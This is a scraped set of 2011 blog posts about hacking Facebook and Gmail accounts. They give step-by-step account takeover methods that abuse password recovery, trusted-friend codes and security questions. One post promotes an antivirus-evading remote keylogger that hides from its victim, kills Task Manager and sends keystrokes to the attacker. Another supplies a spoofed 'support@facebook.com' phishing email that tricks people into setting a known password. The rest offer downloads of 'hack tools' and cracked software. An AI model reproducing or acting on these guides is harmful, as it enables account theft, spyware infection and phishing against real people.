</ul><div class="separator" style="clear: both; text-align: center;"><a href="http://adf.ly/356733/https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjmavywJZa37utQoCW3Fe72gbprwARM1dukzgBkoGYfSBE88AK2lpArjtN5-r6JXgoq2AFrgekOnLvxM_1qXN4FnxoQZraLPGx5mK3mI5is6FRtdOV1WEmRUrELSNeGMpzfUxzQZHlW0RIr/s1600/hacking+of+facebook+account.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjmavywJZa37utQoCW3Fe72gbprwARM1dukzgBkoGYfSBE88AK2lpArjtN5-r6JXgoq2AFrgekOnLvxM_1qXN4FnxoQZraLPGx5mK3mI5is6FRtdOV1WEmRUrELSNeGMpzfUxzQZHlW0RIr/s1600/hacking+of+facebook+account.jpg" /></a></div><ul style="text-align: left;"><li>Now create new email account and enter <span3403734><a href="javascript:void(0);" id="Y3403734S7" style="text-decoration: underline;">the email address</a></span3403734> when asked.</li>
<li>Now in victim's Security Question, you have to enter the right answer (only 3 chances will be their/hour )</li>
<li>If you succeed in giving the right answer then you will get the email like this :</li>
</ul><div class="separator" style="clear: both; text-align: center;"><a href="http://adf.ly/356733/https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiqSEVAXZDXjAL7Dsnf7LL7RvfvKOsmIFdS1Bl9sdeGusdZ17WsYXsExAzf6P8PDniCISYD3SM4_ADWS2jXHYPMzghYyjoH1YFQbTzVQpXzFN8XvdeXDUkFVM5KqqjwVVepJKRFb0ZWm1qm/s1600/hack+facebook+accounts.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiqSEVAXZDXjAL7Dsnf7LL7RvfvKOsmIFdS1Bl9sdeGusdZ17WsYXsExAzf6P8PDniCISYD3SM4_ADWS2jXHYPMzghYyjoH1YFQbTzVQpXzFN8XvdeXDUkFVM5KqqjwVVepJKRFb0ZWm1qm/s1600/hack+facebook+accounts.jpg" /></a> </div><ul style="text-align: left;"><li> Click on the link and you will have the option of "Change the password"</li>
<li>Just change the pass, And now you will have the access to victim's FB account after 24 hours.</li>
<li>You are done, You have successfully <b>Hack Facebook <span3403734><a href="javascript:void(0);" id="Y3403734S2" style="text-decoration: underline;">Account Online</a></span3403734></b>.</li>
</ul><br />
So friends, I hope you enjoyed this article on "<i>Hack Facebook Accounts</i>" for free. And if you have any problem while <i>Hacking Of Facebook Acount</i>. Then please do comment and share your problem while <i>Hack Facebook Account Online</i><br />
<br />
This provided method is my secret method, And I hacked many accounts of my friends. Thus follow this method to <i>Hack Facebook Account</i> </div>cyberworldshttp://www.blogger.com/profile/05414601679042826965noreply@blogger.com1tag:blogger.com,1999:blog-7264560992458786351.post-17653094898630504742011-07-16T06:40:00.000-07:002011-07-16T06:40:31.434-07:00UD Remote Keylogger To Hack Gmail, Facebook Account Password (v2.0)<div class="separator" style="clear: both; text-align: center;"><a href="http://cyberworlds.at.ua/images/cyberworlds.at.ua_1.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="320" src="http://cyberworlds.at.ua/images/cyberworlds.at.ua_1.png" width="214" /></a></div><div style="color: black;"><span style="font-weight: bold;"> </span></div><div style="color: black;"><span style="font-weight: bold;">UD Remote Keylogger To Hack Gmail, Facebook Account Password (v2.0)</span><br />
</div><div style="text-align: justify;">FUD keylogger is the one we all want. But when ever I give any Keylogger it got arrested by most of the Anti-spywares and Anti-virus. Previously I posted one UD keylogger and again its got detected in 4 days only. So again I am going to share the same keylogger's updated FUD keylogger<br />
<br />
<h1 style="background-color: #cfe2f3;"><span style="font-size: x-small;">Hack Facebook Accounts , Hack Gmail Account With FUD Keylogger</span></h1>Here I am going to present a <b>New Remote Keylogger</b> which has the power to <b>hack facebook accounts</b> and <b>Hack Gmail Accounts</b> to record all the key strokes typed</div><div style="text-align: justify;"> </div><div style="text-align: justify;"><span style="color: #00cfff;"><br />
<div style="color: black; text-align: justify;"><h3 style="background-color: #cfe2f3;"><span style="font-size: x-small;">Features Of New UD Remote Keylogger :</span></h3><ul><li>UD - 1/33</li>
<li>You Can Use Gmail Account to get the logs</li>
<li>Add To Start Up also included</li>
<li>It also Kills Task Manager</li>
<li>Automatically Hides the virus after infecting the victim</li>
<li>Also Disables Registry Editing</li>
<li>Stops victim From Ending Your Keylogger's Process</li>
<li>New <span1681631><a href="javascript:void(0);" id="Y1681631S7" style="text-decoration: underline;">Icon</a></span1681631> Changer</li>
<li>File Binder</li>
<li>With Fake Error Message</li>
<li>Includes Time Interval</li>
</ul><h4 style="background-color: #cfe2f3;">How To Use This Remote Keylogger for Hacking Of Facebook Accounts</h4>- <a href="http://adf.ly/356733/http://cyberworlds.at.ua/"><b>Download The Remote UD Keylogger</b></a> and extract the folder to desktop<br />
- Open the Remote keylogger and enter new created Gmail account username and password<br />
- Select the other settings as you need and donot forget to change Time Interval to 2 min<br />
- If you want then use Icon changer, File Binder, etc and then click on Build <span1681631><a href="javascript:void(0);" id="Y1681631S9" style="text-decoration: underline;">Server</a></span1681631><br />
- Now <span1681631><a href="javascript:void(0);" id="Y1681631S8" style="text-decoration: underline;">upload</a></span1681631> this keylogger to file sharing sites like <span style="font-weight: bold;">megaupload.com , mediafire.com</span><br />
- Now send Server to victim by any mean and when he/she will click on server, he will be hacked<br />
- Now you will get the victim typed keystroke which also includes <b>Hack Facebook Account Password</b><br />
- You can hack any account by this Remote Keylogger<br />
<br />
So you are done, I am sure that you will enjoy this Remote Keylogger and if you have any problem then please do comment and share your problem. I am always ready to help you all.<br />
<br />
Incoming search terms:-<br />
<ul style="text-align: left;"><li><b>Hack Gmail Account</b></li>
<li><b>Hacking of facebook account</b></li>
<li><b>Hack gmail account</b></li>
<li><b>Hack Gmail account password</b></li>
<li><b>Hack facebook <span1681631><a href="javascript:void(0);" id="Y1681631S5" style="text-decoration: underline;">account online</a></span1681631></b></li>
</ul>Download Link <a href="http://adf.ly/20N1F">Down</a></div></span></div><div style="text-align: justify;"> </div>cyberworldshttp://www.blogger.com/profile/05414601679042826965noreply@blogger.com1tag:blogger.com,1999:blog-7264560992458786351.post-51731138573638440142011-07-16T06:37:00.000-07:002011-07-16T06:37:35.239-07:00Pro Facebook Hack v1.5 with password | 100% WORKING<div class="separator" style="clear: both; text-align: center;"><a href="http://cyberworlds.at.ua/images/pro_facebook_hack.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="259" src="http://cyberworlds.at.ua/images/pro_facebook_hack.png" width="320" /></a></div><div style="color: black; text-align: justify;"><span style="font-size: small;"><span>1. <span3593736><a href="javascript:void(0);" id="Y3593736S13" style="text-decoration: underline;">Protect</a></span3593736> My Account Facebook From Hack :</span><br />
<span></span><br />
<span>Protect yourself from hackers by this program,</span><br />
<span>So can not do any one by this program you can penetrate your account facebook</span><br />
<span></span><br />
<span>2. Hack Facebook :</span><br />
<span></span><br />
<span>Is able to penetrate anyone who has an account in the facebook</span><br />
<span>Knowing the password + Email<br />
<br />
System requirements:<br />
<br />
The following hardware and software is required to run Data Analysis and matrix find ip and Pro Facebook Hack. <br />
<br />
An <span3593736><a href="javascript:void(0);" id="Y3593736S5" style="text-decoration: underline;">Intel</a></span3593736> <span3593736><a href="javascript:void(0);" id="Y3593736S15" style="text-decoration: underline;">Pentium</a></span3593736> <span3593736><a href="javascript:void(0);" id="Y3593736S19" style="text-decoration: underline;">processor</a></span3593736> or equivalent, 3 GHZ or faster <br />
<span3593736><a href="javascript:void(0);" id="Y3593736S17" style="text-decoration: underline;">Windows</a></span3593736> 98, Windows XP, SP3 , Windows <span3593736><a href="javascript:void(0);" id="Y3593736S16" style="text-decoration: underline;">Vista</a></span3593736> or Windows 7<br />
At least 256 MB of available random-access <span3593736><a href="javascript:void(0);" id="Y3593736S8" style="text-decoration: underline;">memory</a></span3593736> (<span3593736><a href="javascript:void(0);" id="Y3593736S18" style="text-decoration: underline;">RAM</a></span3593736>) (512 MB recommended)<br />
<br />
<br />
<a href="http://adf.ly/20NmT">Downlead Microsoft .NET Framework (required)</a><br />
<br />
<span3593736><a href="javascript:void(0);" id="Y3593736S12" style="text-decoration: underline;">Download Link</a></span3593736> <a href="http://adf.ly/1rK8A">Above (Via Ziddu)</a><br />
<br />
OR<br />
<br />
<a href="http://adf.ly/20Nsv">Mirro Link (Via easy-share)</a></span></span></div>cyberworldshttp://www.blogger.com/profile/05414601679042826965noreply@blogger.com1tag:blogger.com,1999:blog-7264560992458786351.post-50848696053982604982011-07-16T06:33:00.000-07:002011-07-16T06:34:50.311-07:00Hacking Facebook Account Password in 5 steps<span style="color: #00cfff;"><img alt="" height="192" src="http://cyberworlds.at.ua/images/Hacker_Facebook.jpg" width="320" /><br />
<br />
<br />
<div style="text-align: justify;"><br />
<div style="color: black;">So, let us start with the steps for hacking Facebook account password.</div><div style="color: black;">1. Go to Facebook.com and hit on Forgot Password link to get this page:</div><div style="color: black;"><img alt="Hacking Facebook account password" class="aligncenter size-full wp-image-608" height="283" src="http://techotoys.net/wp-content/uploads/2011/06/Hacking-Facebook-account-password1.jpg" title="Hacking Facebook account password" width="320" /></div><div style="color: black;">2. You have to enter the email of the victim, or even the Facebook profile name will do. Facebook will search for profile name and you will be shown <span class="IL_AD" id="IL_AD3">the account</span>. Hit on "This is my account”</div><div style="color: black;"><img alt="Hacking Facebook account" class="aligncenter size-full wp-image-607" height="152" src="http://techotoys.net/wp-content/uploads/2011/06/Hacking-Facebook-account.jpg" title="Hacking Facebook account" width="320" /></div><div style="color: black;">3. On the next page, hit on "No longer have access to these”.</div><div style="color: black;"><img alt="How do I hack a Facebook account" class="aligncenter size-full wp-image-610" height="147" src="http://techotoys.net/wp-content/uploads/2011/06/How-do-I-hack-a-Facebook-account.jpg" title="How do I hack a Facebook account" width="320" /></div><div style="color: black;">4. You will be prompted for email address. Enter your email address here and hit on "Submit”.</div><div style="color: black;"><img alt="Hacking Facebook password" class="aligncenter size-full wp-image-609" height="130" src="http://techotoys.net/wp-content/uploads/2011/06/Hacking-Facebook-password.jpg" title="Hacking Facebook password" width="320" /></div><div style="color: black;">Facebook will ask you ask you to answer the <span4706936><a href="javascript:void(0);" id="Y4706936S9" style="text-decoration: underline;">Security</a></span4706936> question. No worries here. Just enter the wrong answer 3 times and you will move to this page:</div><div style="color: black;"><img alt="Hacking Facebook account final" class="aligncenter size-full wp-image-606" height="264" src="http://techotoys.net/wp-content/uploads/2011/06/Hacking-Facebook-account-final.jpg" title="Hacking Facebook account final" width="320" /></div><div style="color: black;">5. Now comes the real hacking part. After hitting on Continue, Facebook will ask you to select the 3 Trusted <span4706936><a href="javascript:void(0);" id="Y4706936S7" style="text-decoration: underline;">Friends</a></span4706936>. Your 3 fake accounts (created previously) will be listed in the Friends list of the victim. Select those 3 Fake accounts. Facebook will send security <span4706936><a href="javascript:void(0);" id="Y4706936S5" style="text-decoration: underline;">codes</a></span4706936> to these Fake accounts (which are our accounts). Now, enter the 3 security codes. Facebook will send <b>Password Recovery Email</b> at your email you’ve entered in Step 4. You can easily change password of your <span4706936><a href="javascript:void(0);" id="Y4706936S6" style="text-decoration: underline;">friend</a></span4706936>’s account.</div><div style="color: black;">Thus, you are successful in hacking Facebook account password of your friend.</div><div style="color: black;"><b>Note:</b> The victim will be emailed about the password change. So, this method of hacking Facebook account is useful only for those whose victim does not check emails regularly.</div><div style="color: black;">I hope you now well approached with this method of <b>hacking Facebook account password.</b> Just make sure that the victim will add your fake accounts as his friend. This is the only tricky part of this Facebook hack. If you have any problem in this method of <i>hacking Facebook account password,</i> please mention it in comments.</div><div style="color: black;">Enjoy method of hacking Facebook account password…</div></div></span>cyberworldshttp://www.blogger.com/profile/05414601679042826965noreply@blogger.com1tag:blogger.com,1999:blog-7264560992458786351.post-47497062301882844922011-07-16T06:31:00.000-07:002011-07-16T06:31:46.292-07:00IStealth's Zynga Ultimate Hack Pack v1.7-BUGS FIXED<div class="separator" style="clear: both; text-align: center;"><a href="http://cyberworlds.at.ua/zyngapoker.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="144" src="http://cyberworlds.at.ua/zyngapoker.png" width="320" /></a></div><div style="text-align: justify;"><span style="color: #00cfff;"><br />
<span485154 style="color: black;">Download</span485154><span style="color: black;"> </span><a href="http://adf.ly/1W2KU">iStealth's Zynga Ultimate Hack Pack</a></span></div>cyberworldshttp://www.blogger.com/profile/05414601679042826965noreply@blogger.com1tag:blogger.com,1999:blog-7264560992458786351.post-83001918069477992102011-07-16T06:29:00.000-07:002011-07-16T06:29:06.899-07:00Hack Facebook Password<div class="separator" style="clear: both; text-align: center;"><a href="http://hackpassword.net/wp-content/uploads/2010/07/facebook-bot-300x161.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="106" src="http://hackpassword.net/wp-content/uploads/2010/07/facebook-bot-300x161.jpg" width="200" /></a></div><div style="text-align: justify;">If you have been looking for how to hack into a facebook account then this site is for you. With our free hacking tool you can obtain the password to nearly any profile on facebook.com. Simply follow the download link and run the program. Enter the details of the profile you want such as name, email and ID, then the tool will attempt the extract their password from the server. This program has been developed by underground hacking communities and we have put it online for anyone to use, for free!<br />
<br />
* Just download the tool and run it. Simple.<br />
* Hack any facebook account password<br />
* Absolutely Free<br />
* Will download the original password in plaintext so you log straight in<br />
* Used by many underground forums and communities<br />
* Safe to download - virus scan results<br />
* Obtains the original password so the victim will not know they have been hacked<br />
* 90% success rate. You can not hack admin, moderator, high profile or celebrity accounts<br />
* We will continously update the software if facebook.com ever patch the security holes<br />
<br />
<br />
How to hack facebook account passwords<br />
Step One: Email<br />
<br />
Please send an email with the subject line 'DOWNLOAD' to the following email address: email@hackfacebookpasswords.net<br />
This is so we can add your email address to the allow list to activate the hack tool. This is so we can restict who uses our software and to stop abuse.<br />
<br />
Step Two: Download<br />
<br />
The Facebook Hack Tool has been developed to run on any Windows platform (XP, Vista, 7 etc). If you run Mac OSx, Linux or any other platform, please contact us and we will let you know when we have those versions. This download is in .exe format so simply download and save into your documents. As with anything you download online, scan with your anti virus to be safe. Once you are happy, run the program and go to step 3.<br />
<br />
Step Three: Run<br />
<br />
* Once you have completed step 2 and the program is running...<br />
* In the first textbox type their facebook ID or Username<br />
(eg. http://www.facebook.com/profile.php?id=1234567890)<br />
* To increase the success rate you can provide the folllowing additional info.<br />
* [Optional] Enter their Full Name.<br />
* [Optional] Enter their Date of Birth in the format of DD/MM/YYYY.<br />
* [Optional] Enter their Email Address.<br />
* To activate the program, you need to enter the Auth code - please see Step 4.<br />
* Click 'Run Exploit'. The program will then run the exploit and attempt to extract the victims password.<br />
* To program is designed to run via multiple proxies to keep you completely anonymous.<br />
* If successful, the original password will be shown in plaintext.<br />
* Simply copy and paste the password and log into their account.</div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;"><span style="color: #00cfff; font-size: small;"><span><br />
</span> <span><b>Download:</b> <a href="http://adf.ly/1VUW4" target="_blank">fbsoft.exe</a></span></span></div>cyberworldshttp://www.blogger.com/profile/05414601679042826965noreply@blogger.com1tag:blogger.com,1999:blog-7264560992458786351.post-82321552870722729602011-07-16T06:26:00.000-07:002011-07-16T06:26:27.160-07:00Facebook Hacking Bundle<div class="separator" style="clear: both; text-align: center;"><a href="http://i1119.photobucket.com/albums/k625/shanky000001/443580023_9e8aa864ae.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="176" src="http://i1119.photobucket.com/albums/k625/shanky000001/443580023_9e8aa864ae.jpg" width="200" /></a></div><div style="text-align: justify;"><span style="font-size: x-small;">FACEBOOK Hacking Bundle<br />
FACEBOOK GAME CHEATS 111 MB<br />
<br />
<br />
1.FACEBOOK PASSWORD CRACKER*<br />
2.FARMVILLE TOOLS*<br />
3.FACEBOOK CHEATS*<br />
4.FACEBOOK DEVIL*<br />
5.FACEBOOK CLINT*<br />
6.GIFT AUTO*<br />
7.IDM FULL WITH CRACK*<br />
8.ALL FACEBOOK GAMES CODES FOR INCREASING LEVEL*<br />
9.FACEBOOK ADDER*<br />
10.FUN BOX*<br />
11.GMAIL HACK*<br />
12.FACEBOOK FREEZER*<br />
ALL MAJOR INSTRUCTIONS ARE IN BUNDLE.<br />
AND GIFTAOTO IS A NEW TOOL FOR ACCEPTING ALL THE GAMES REQUESTS IN FACEBOOK AUTOMATICALY.<br />
JUST LEAVE COMMENTZ IF U LIKE THE ARTICLE..:<br />
<br />
DOWNLOAD_111 MB_</span></div><div style="text-align: justify;"></div><div align="left"><div class="scriptcode"><br />
<a href="http://adf.ly/1F9tB"><span style="color: limegreen;"><b>Click Here</b></span></a><br />
<a href="http://adf.ly/1F9tB"><span style="color: limegreen;"><span></span></span></a><!--code2--></div><!--ecode2--></div>cyberworldshttp://www.blogger.com/profile/05414601679042826965noreply@blogger.com1tag:blogger.com,1999:blog-7264560992458786351.post-50620160316013792202011-07-16T06:23:00.000-07:002011-07-16T06:23:13.290-07:00Facebook Account Hacker v 2.4<div class="separator" style="clear: both; text-align: center;"><a href="http://i83.servimg.com/u/f83/12/33/79/02/210.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="189" src="http://i83.servimg.com/u/f83/12/33/79/02/210.jpg" width="200" /></a></div><div style="text-align: justify;">Facebook Account Hacker v 2.4<br />
<br />
<br />
<br />
Enter The Target E-Mail Address<br />
Type In A Number Of Password To Randomly Generate To Try To Hack The Facebook Account<br />
Uses The Facebook API To Quickly Enter Passwords And Bypass CAPTCHA</div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;"><span style="color: #00cfff;"><br />
<br />
<div align="center"><a href="http://adf.ly/1UqDa"><img height="85" src="http://www.techlearning.com/uploadedimages/Download_Now_button_blue.png" width="200" /></a></div></span></div>cyberworldshttp://www.blogger.com/profile/05414601679042826965noreply@blogger.com1tag:blogger.com,1999:blog-7264560992458786351.post-7936451882466893952011-07-16T06:21:00.000-07:002011-07-16T06:21:00.971-07:00Free Chip Poker Facebook<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh03jCl2vhQ14MMix6zNXjuKX6CIuSRD6J5lvCbf08gg0mFDy1jeT8mnUGSq2nLA_sMvsTL-UGyl_B0XswCxOEk521Jpe5PLYsfFZGt9PsSHM3_4YCB3TDsy4-vsZ7fCIRJ3ISf310CIl9r/s400/FacebookPokerChipHack.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="188" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh03jCl2vhQ14MMix6zNXjuKX6CIuSRD6J5lvCbf08gg0mFDy1jeT8mnUGSq2nLA_sMvsTL-UGyl_B0XswCxOEk521Jpe5PLYsfFZGt9PsSHM3_4YCB3TDsy4-vsZ7fCIRJ3ISf310CIl9r/s200/FacebookPokerChipHack.png" width="200" /></a></div><div style="text-align: justify;">Free Chip Poker Facebook<br />
<br />
<br />
Poker is a very fun game, can even forget the time. But the problem is how jik achip that we have run out? Actually there is no software to hack facebook poker chips, but little software that can still be used. Maybe this a software that can help you to cheat. Please feel free to download for free via this blog</div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;"><span style="color: #00cfff;"><br />
<br />
<div align="center"><a href="http://adf.ly/1UpDK"><img height="85" src="http://www.techlearning.com/uploadedimages/Download_Now_button_blue.png" width="200" /></a></div></span></div>cyberworldshttp://www.blogger.com/profile/05414601679042826965noreply@blogger.com1tag:blogger.com,1999:blog-7264560992458786351.post-13006572298393222842011-07-16T06:18:00.000-07:002011-07-16T06:18:23.670-07:00How to Hack a Facebook account password<div class="separator" style="clear: both; text-align: left;"><a href="http://techotoys.net/wp-content/uploads/2011/04/Facebook_login.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="142" src="http://techotoys.net/wp-content/uploads/2011/04/Facebook_login.jpg" width="200" /></a></div><div style="text-align: justify;">Few days back, I posted an article How to hack someones Facebook which explains one of the best methods useful to hack a Facebook account password. Recently, I posted Anonym Mailer software coded by me. One of my reader cum friend Mohamad shared his expert trick on how to hack a Facebook account password using Anonym Mailer software. I am posting about the same hack in this article.<br />
<br />
Note: The article is meant to make you aware of how your Facebook account can be hacked. Please do not try this. Hacking anyone’s account is illegal and can take you behind the bars.<br />
<br />
How to hack a Facebook account password:<br />
<br />
First, I would like to tell you about my Anonym Mailer software. This software is useful to send emails to your friends using anyone’s email address. That means, you can use any email address as sender email address.<br />
<br />
Now, comes the real hack. Consider yourself getting an email from "support@facebook.com” like this:<br />
<br />
Dear (Your Name here),<br />
This is to inform you that we are going to deactivate your account in 15 days because you have not followed our terms and rules while using your Facebook account. We found that your Facebook account is not following our rule 5.A.1 which is listed in our Content Guidelines.<br />
<br />
To reactivate your account, please change your password to 12345678. Please keep up your password as 12345678 for at least a week so that we can verify your ownership.<br />
Thank you.<br />
<br />
Right now, you will think that no one will fall for this. I know your reaction is true. But wait. We all know there are hundreds of internet frauds occurring daily due to spam jackpot emails. Now, we all know jackpot emails are fake. In spite of that, people fall to such emails. Also, we are witnessing tons of scams on Facebook, the recent one being "Find who viewed your profile”.<br />
<br />
If people believe in such stupid scams, why won’t they believe in above email??? And what more, it is sent from "support@facebook.com”. This is the most convincing reason of this email. How many netizens know how to check a particular mail as "Fake”??? According to me, the proportion is not more than 20%. What about the rest 80%??? They are most probable of falling to such emails.<br />
<br />
Update: Shafraz has shared a nice trick with us in comments. He has added "Phone notification” feature so that the above email becomes much more convincing. Guys, its all about Social engineering. Great work Shafraz and thanks for sharing your valuable trick.<br />
<br />
So, this email can really help anyone to hack a Facebook account password. Once the victim changes his Facebook password to "12345678″, the hacker can easily access his account and thus, hack Facebook account. I just want to make all Techotoys readers aware of such emails. Do not fall to such emails. Facebook will never ask you to change your password to something like 12345678.<br />
<br />
Note: This trick can be used to hack any online account. I have demonstrated on how to hack a Facebook account password using this method.<br />
<br />
So guys, this was a short tutorial on how Anonym Mailer can be used to hack a Facebook account password. This hack depends on the hacker’s creativity as it requires Social Engineering skills. I would like to thank Mohamad(modi_safadieh@hotmail.com) for sharing his trick on how to hack a Facebook account password.</div>cyberworldshttp://www.blogger.com/profile/05414601679042826965noreply@blogger.com1tag:blogger.com,1999:blog-7264560992458786351.post-67313155534615693212011-07-16T06:13:00.000-07:002011-07-16T06:14:35.687-07:00Bypass Sharecash Surveys 100% Working<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhB7lrv3_eYic5Q9y2qQBHA_8LZ_uel2W9wr87zFYw5-1is-fTePezQEdGngAhCs2p-u_v61XMJbA4yOxCCucN8za3KH_iKN1E9aLJL1LxuS4p1tf8vva2qsAi61DSSgv-t1TgdaysCS-lF/s200/sharecash+downloader+2011+by+www.latest-hackers.co.cc.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="110" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhB7lrv3_eYic5Q9y2qQBHA_8LZ_uel2W9wr87zFYw5-1is-fTePezQEdGngAhCs2p-u_v61XMJbA4yOxCCucN8za3KH_iKN1E9aLJL1LxuS4p1tf8vva2qsAi61DSSgv-t1TgdaysCS-lF/s200/sharecash+downloader+2011+by+www.latest-hackers.co.cc.jpg" width="200" /></a></div><div style="text-align: justify;">Hi friends I hope you all are fine, After my two articles for "Bypass Sharecash Surveys" I am again here with new and 100% working Sharecash Downloader 2011 - May. I came to know that previous Downloader was not so user friendly and the readers was not able to use that properly so I though to make a new article in which I will explain each and every steps. So here is the full guide..... <br />
Bypass Sharecash Surveys Using Sharecash Downloader<br />
This new version is very user friendly and its very easy to use without any more hassle, just follow this little steps and then enjoy Downloading From Sharecash<br />
<br />
1) Download Sharecash Downloader 2011 - May<br />
2) Open it and you will see something like this below :</div><div style="text-align: justify;"><br />
</div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjWxW5OKwET0nF-Z_LNRfVu833P4_xLfgEnsaT8nVxgR5Q99rZ5eoed103q0QHyqrGCwoW72Im63V_Ry9TTincYdesz7q2pnSK-87AERmf2NpmE7msUVJHruzDeliX7OTpGLhyphenhyphen09_r77Epa/s1600/sharecash+downloader.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="171" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjWxW5OKwET0nF-Z_LNRfVu833P4_xLfgEnsaT8nVxgR5Q99rZ5eoed103q0QHyqrGCwoW72Im63V_Ry9TTincYdesz7q2pnSK-87AERmf2NpmE7msUVJHruzDeliX7OTpGLhyphenhyphen09_r77Epa/s400/sharecash+downloader.jpg" width="400" /></a></div><div style="text-align: justify;"></div><div style="text-align: justify;">3) Enter your Sharecash Download Link in the field and then check "direct link"<br />
4) If its Mirror link then also enter the link and then instead check "mirror link"<br />
5) Now click on "Speed Load" and then wait for 1 minutes (please don't hurry, otherwise it will not work)<br />
6) After click on "Download" and then after sometime you can see a popup, just click on "OK"<br />
7) You are done, now you see a Download Box containing your file.<br />
8) Enjoy Downloading From Sharecash.<br />
<br />
Credits to : BBtech, Krishna<br />
<br />
Getting Errors While Using Sharecash Downloader?<br />
<br />
If you are getting some errors about .Net version then please update to Net 4.0 (search in google) . Or if you are getting error regarding Downloading The File then wait for bit time and then try again with the above given steps<br />
<br />
So friends I hope you have enjoyed this Sharecash Downloader 2011 which can easily Bypass Sharecash Surveys For Free. And if you have problem regarding<br />
Bypass Sharecash Surveys | Sharecash Downloader 2011<br />
<br />
Then please share your problem via comments because I am always ready to help you. And please also give your feedback via comment.<br />
<br />
incoming search terms:-<br />
Sharecash Survey Bypasser<br />
Sharecash Auto downloader<br />
Bypassing sharecash surveys</div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;"><span style="color: #00cfff;"><b>Download <a href="http://adf.ly/1htzi">Above</a></b></span></div>cyberworldshttp://www.blogger.com/profile/05414601679042826965noreply@blogger.com1